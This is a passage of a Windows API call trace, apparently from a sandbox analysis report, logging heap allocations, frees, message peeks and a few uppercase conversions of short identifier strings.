HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.241] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.242] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.242] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.243] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.243] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.244] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.244] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.246] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.246] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0206.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.249] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.249] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.250] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.250] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.251] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.253] PeekMessageW (in: lpMsg=0x8bf3c0, 